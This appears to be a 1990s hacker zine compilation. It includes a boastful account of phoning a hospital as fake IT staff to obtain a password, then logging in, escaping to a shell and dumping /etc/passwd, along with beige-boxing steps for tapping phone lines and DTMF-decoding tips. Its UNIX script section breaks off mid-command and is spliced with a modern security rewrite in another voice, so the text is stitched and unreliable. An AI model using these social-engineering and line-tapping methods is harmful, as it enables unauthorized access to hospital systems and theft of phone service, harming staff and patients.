Me: "Well, we've been really busy here lately. We're upgrading the cryptographic algorithm on your primary domain controller. As well as re-compiling the user accounts database. And I thought I'd call office to office to make sure that everyone could get in OK. Could you log out and log back in for me?"
Office girl: "Sure, no problem. Just a minute. Do I just enter "jjohnson" and my password like always?"
Me: "Wait a second and I'll dial in and check. You said you enter "jjohnson"? And what password?"
Office girl: "medical"
Me: "All lower case?"
Office girl: "yes"
Me: "Well, <dramatic pause> it looks good on my end. Why don't you go ahead and try."
Office girl: "Ok....<long pause>......Ok I'm in!"
Me: "Great! Thanks, if you run into problems give me a call here at the office."

The thing that struck me about her password was it was "medical", which was also a part of the title of the software package that they were using. It sounded a lot like the default password that came installed when the vendor installed all the user accounts. So I promptly dialed in, logged in as "jjohnson" with a password of "medical". The bummer was that I was within a program and couldn't reach a shell prompt. No problem, I entered "!"
(like hacking PINE) and bingo, a "$" appeared. After that, I did a cat of /etc/passwd to get a listing of all the logins. Notice I didn't do "shadow"; all I would've got is an "access denied" and a possible entry on the admin's log. After that I logged off and checked all the other logins to see if they were also using the default password of "medical". Sure enough, 7 were!! It is important to try this in case "Jackie" gets paranoid and calls the support line and has her password changed. Then you're back to square one.

The moral of this story is, I managed to compromise the security of a major hospital just by being friendly and confusing the office help. No k-rAd 3l33t3 haX here, just stupid end users :) !

WaRsPrItE

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBMd/IkH5eXk/jGmY7AQGR0Af/UTrFWHAjsWIsCBXha+LSAqtJ68548Khw
9ye7ug1HAVU9Mu5JmbmwoKcIoavfNeLPB/35zMAnCPmpFf92US8bCSAe1MbRrmQL
uzwqDjuo0SX/hco+HSqhd6fnajoGp9rqxEpq3QdwQ+/b9I8YTEraw30Yq+yA/Rsg
jtOmnAKvTlb/jSsvg8wmX0xqfTJZANIOvDFXa2+sVGwuY5uh9symfMKmUXzrpNQC
EZUtKMJnqVzpwIhZJPLAawgnFDbAu8mT8UZ/BQVJ/GeyaVwiDe8VzkuiACDY418f
kRFWDNSObbadWVuLoGxo9Ag6hfhquuptrRx8SJm19OgeUzam1dXX0Q==
=f/5Y
-----END PGP SIGNATURE-----

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

DTMF Decoding - By ArcAngl

Ok, I have had the shits of having newbies beg for info on HOW TO DECODE DTMFs!! So here it is.... 2 ways of many!

software: WWW.Cyberramp.net/~shima/index.html

It will only decode 4 digits at a time with the shareware version, but if you're clever, you record the wav file then edit it into pieces to decode whole #'s.

...or

If you're clever, you will record the number, then dial your own pager # and play it back into the phone, and press the pound sign when done. The pager will show the # in a minute. ;-

_____________________________________________________________

-------------
--=[Redneck Phreaking]=--
By Shoelace
-------------

Hola!
Shoelace here, writing a small, lame entry to inform people near me, and in other places down South, about how easy it really is to get even the simplest phreaking in. Contrary to popular belief, there are phreaks in Tennessee. In my town, we have only 5 that I know of. The most noted of course, is dr1x/kz. I think only three of us have modified our Tone Dialers to make them into Red Boxes, with the help of Acid_novA.

But, the simplest of all phreaking here, or at least in East Tennessee, is Beige Boxing. You don't even need alligator clips, or really anything else in the help files about Beige Boxing that you have probably read. All you need is a screwdriver, and a regular phone. You see, behind all the houses are these grayish colored boxes of various sizes. They usually say "Telephone Network Interface" on them. They are attached by screws. Unscrew it, and open it up. You will see one, maybe two (if they have two lines), holes with phone jacks in them. Take out that jack, and put in your phone. You should have dialtone. Ta da! That is how easy it is to Beige Box down South. I don't know what other states have their boxes like this, but if you do, don't delay! Go out and Beige Box!

-Shoelace
-http://www.public.usit.net/sltaylor

-------
--=[The End]=--
-------

_____________________________________________________________

Basic UNIX Scripting...................WaRsPrItE

-----BEGIN PGP SIGNED MESSAGE-----

Here's some basic UNIX scripts that I found useful for searching a system for log files, grep'ing for possible entries, and traversing directory trees. These were written for SCO UNIX.

# .kshrc -- Commands executed by each Korn shell at startup
# Copyright (c) 1990, The WaRsPrItE Corporation Inc. =]
# All rights reserved.

# If there is no VISUAL or EDITOR to deduce the desired edit
# mode from, assume vi(C)-style command line editing.
if [ -z "$VISUAL" -a -z "$EDITOR" ]; then
    set -o vi
fi

TMOUT=300

#-----------------------------------------------------------------
# Session information
#-----------------------------------------------------------------
info() {
    echo "\nDate `date '+%m/%d/%y %H:%M'`\n"
    echo "logname `logname`"
    echo "Parent PID $PPID"
    echo "Old pwd $OLDPWD"
    echo "On `expr $SECONDS / 60` minutes"
    echo "Path $PATH"
    echo "cd path $CDPATH"
    echo "Home $HOME"
    echo "Time out $TMOUT"
    echo "Current Jobs `jobs`"
    echo "Spooler `lpstat`"
}

#-----------------------------------------------------------------
# Change Directory
# Changes directory and sets the new PS1 variable
#-----------------------------------------------------------------
ccd() {
    if [ -n "$1" ]
    then
        cd "$1" && PS1="!_`logname`_`pwd`> "
    fi
}

#-----------------------------------------------------------------
# List DIRectories  (l is SCO's long listing, ls -l elsewhere)
#-----------------------------------------------------------------
ldir() {
    l -F $1 | grep / | more
}

#-----------------------------------------------------------------
# File Find
# Recursively looks for a file from the working directory
#-----------------------------------------------------------------
ffind() {
    if [ $# = 1 ]
    then
        find . -name "$1" -print
    else
        echo "Usage: ffind <filename>"
    fi
}

#-----------------------------------------------------------------
# Recursive Grep
# Searches all files below the working directory for a string
# (-local is SCO find's "stay on local filesystems" option)
#-----------------------------------------------------------------
rgrep() {
    if [ $# = 1 ]
    then
        echo "Searching: $1"
        find . -local -exec grep -il "$1" {} \;
    else
        echo "rgrep: Invalid number of arguments"
    fi
}

#-----------------------------------------------------------------
# Recursive Chmod
#-----------------------------------------------------------------
rchmod() {
    if [ $# = 1 ]
    then
        find . -local -exec chmod "$1" {} \;
    else
        echo "Usage: rchmod <mode>"
    fi
}

#-----------------------------------------------------------------
# Recursive Chown
#-----------------------------------------------------------------
rchown() {
    if [ $# = 1 ]
    then
        find . -local -exec chown "$1" {} \;
    else
        echo "Usage: rchown <owner>"
    fi
}

#-----------------------------------------------------------------
# Recursive Chgrp
#-----------------------------------------------------------------
rchgrp() {
    if [ $# = 1 ]
    then
        find . -local -exec chgrp "$1" {} \;
    else
        echo "Usage: rchgrp <group>"
    fi
}

alias cd="ccd"
alias home="cd $HOME ; clear ; m"
alias .l="history"
alias .x="fc -e -"
alias .e="fc -e vi "

#-----------------------------------------------------------------
# Total the size of the files in the current directory
# Keeps a running total of the size column (field 5 of l) and
# runs file(1) on the name in the last field of each line
#-----------------------------------------------------------------
total() {
    clear
    l $1 | awk '
    {
        if ( $1 != "total" ) {
            counter = counter + $5
            printf("%10s %s\n", counter, $0)
            system("file " $NF)
        }
    }' | more
}

#-----------------------------------------------------------------
# Easy Change Directory
#
# I found this in a sys admin forum and modified it. Changed the
# home of the ecd files to /tmp to save room on the system. If
# you want everyone to have their own list just change the /tmp's
# to $HOME. Sorry the modules are not very well documented, it was
# late and I concentrated more on the code.
#
# Scott
#-----------------------------------------------------------------
ecd() {
    if [ $FCD ]
    then
        echo "sorry.."
        return
    else
        FCD="Fcd"
        export FCD
    fi
    echo
    echo "Loading ecd: type \"ecd\" for information"

    #-----------------------------------------------------------------
    # add a directory to the list
    #-----------------------------------------------------------------
    addline() {
        error=0
        echo "Enter full path of $Newline: \c"
        read Fullpath
        if [ -d "$Fullpath" ]
        then
            echo $Fullpath >> /tmp/ecd.list
        else
            echo "Sorry, can't find that directory!"
            error=1
        fi
    }

    #-----------------------------------------------------------------
    # usage
    #-----------------------------------------------------------------
    function usage {
        echo "\n"
        echo "Easy Change Directory:"
        echo
        echo "Usage: ecd directory-name"
        echo "       ecd -e directory   for extended search."
        echo "       ecd -p             to add current directory to list."
        echo "       ecd -r             to recursively scan directories under current."
        echo "\n"
    }

    #-----------------------------------------------------------------
    # main Loop
    #-----------------------------------------------------------------
    function ecd {
        error=0
        FileDir=/tmp/ecd.list
        Duplist=/tmp/ecd.dup
        if [ $# = 0 ]
        then
            usage
            return 0
        fi
        Extend="NO"

        #-----------------------------------------------------------------
        # Check for right parameters
        #-----------------------------------------------------------------
        case $1 in
        "-e")
            if [ $# != 2 ]
            then
                echo "Error: insufficient parameters ($#)"
                echo "Usage: ecd -e directory"
                return 1
            fi
            Extend="YES"
            shift
            ;;
        "/")
            ccd /
            return 0
            ;;
        "-p")
            CurDir=$(pwd)
            grep "$CurDir\$" $FileDir > /dev/null
            if [ $? != 0 ]
            then
                echo $CurDir >> $FileDir
                return 0
            else
                echo "Current directory $CurDir\n is already in $FileDir"
                return 1
            fi
            ;;
        "-r")
            echo "Scanning directories under $PWD"
            find $PWD -type d -print >> $FileDir
            sort "$FileDir" | uniq > $Duplist
            if [ $? = 0 ]
            then
                echo "Sorted and cleaned up $FileDir"
                echo
                mv $Duplist $FileDir
            fi
            return 0
            ;;
        esac

        #-----------------------------------------------------------------
        # Does a list exist? if not make one
        #-----------------------------------------------------------------
        if [ ! -f $FileDir ]
        then
            echo "Creating new $FileDir in /tmp. It may take a while..."
            find /tmp -type d -print > $FileDir
        fi

        #-----------------------------------------------------------------
        # Check the list
        #-----------------------------------------------------------------
        if [ $Extend = "YES" ]
        then
            grep $1 $FileDir > $Duplist
        else
            grep $1'
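The ecd tool above keeps its list in /tmp/ecd.list and dedupes through a fixed /tmp/ecd.dup, which is the one thing a reviewer would flag: /tmp is writable by every local user, so whoever creates ecd.list first decides where your "ecd" sends you, and the fixed scratch name plus the unconditional "mv $Duplist $FileDir" is a classic symlink and race target. The following is an added example, not the zine's or WaRsPrItE's code, showing the same tool rebuilt per user in POSIX sh. The ~/.ecd location, the function names, the exact-basename match rule (the original's final grep is cut off on the page, so that rule is this example's own choice) and the use of mktemp(1) are all assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the zine): per-user ecd-style directory list.
# State lives in a 0700 directory with a 0600 list instead of the shared
# /tmp/ecd.list and /tmp/ecd.dup of the original; the scratch copy used
# for de-duplication comes from mktemp(1) inside that private directory.

ECD_DIR="${ECD_DIR:-$HOME/.ecd}"   # assumed location; override to test elsewhere

ecd_init() {
    # create directory and list under a tight umask so there is never a
    # moment at which either is group- or world-readable
    (umask 077 && mkdir -p "$ECD_DIR" && : >> "$ECD_DIR/list") || return 1
    chmod 0700 "$ECD_DIR" && chmod 0600 "$ECD_DIR/list"
}

ecd_add() {
    # the original's -p: add one directory (default: current), refusing
    # non-directories and duplicates; CDPATH is cleared so cd cannot print
    # or redirect, and pwd -P stores the resolved path
    dir=$(unset CDPATH; cd -- "${1:-.}" 2>/dev/null && pwd -P) ||
        { echo "ecd: not a directory: ${1:-.}" >&2; return 1; }
    ecd_init || return 1
    if grep -Fxq -- "$dir" "$ECD_DIR/list"; then
        echo "ecd: already listed: $dir" >&2
        return 1
    fi
    printf '%s\n' "$dir" >> "$ECD_DIR/list"
}

ecd_scan() {
    # the original's -r: add every directory below $1 (default: current),
    # then de-duplicate through an unpredictable mktemp file, not /tmp/ecd.dup
    root=$(unset CDPATH; cd -- "${1:-.}" 2>/dev/null && pwd -P) || return 1
    ecd_init || return 1
    find "$root" -type d -print >> "$ECD_DIR/list"
    tmp=$(mktemp "$ECD_DIR/list.XXXXXX") || return 1
    sort -u "$ECD_DIR/list" > "$tmp" && mv -f "$tmp" "$ECD_DIR/list"
}

ecd_find() {
    # print matching entries: "-e text" is a fixed-string search anywhere in
    # the path; otherwise the last path component must match exactly
    # (no regex, so a name like "a.b" cannot match "aXb")
    if [ "$1" = "-e" ]; then
        grep -F -- "$2" "$ECD_DIR/list"
    else
        awk -v want="$1" -F/ '$NF == want' "$ECD_DIR/list"
    fi
}

ecd_cd() {
    # change to the single matching entry; an ambiguous name is listed and
    # refused rather than silently taking the first hit
    matches=$(ecd_find "$@" 2>/dev/null || :)
    if [ -z "$matches" ]; then
        echo "ecd: no entry for: $*" >&2
        return 1
    fi
    if [ "$(printf '%s\n' "$matches" | grep -c .)" -ne 1 ]; then
        printf 'ecd: ambiguous, pick one:\n%s\n' "$matches" >&2
        return 1
    fi
    cd -- "$matches"
}
```

Source the file from .kshrc or .profile and alias the original names onto these functions if you like; the point is that nothing another local user writes can change where ecd_cd takes you, and the list of directories you work in is no longer readable by everyone on the box.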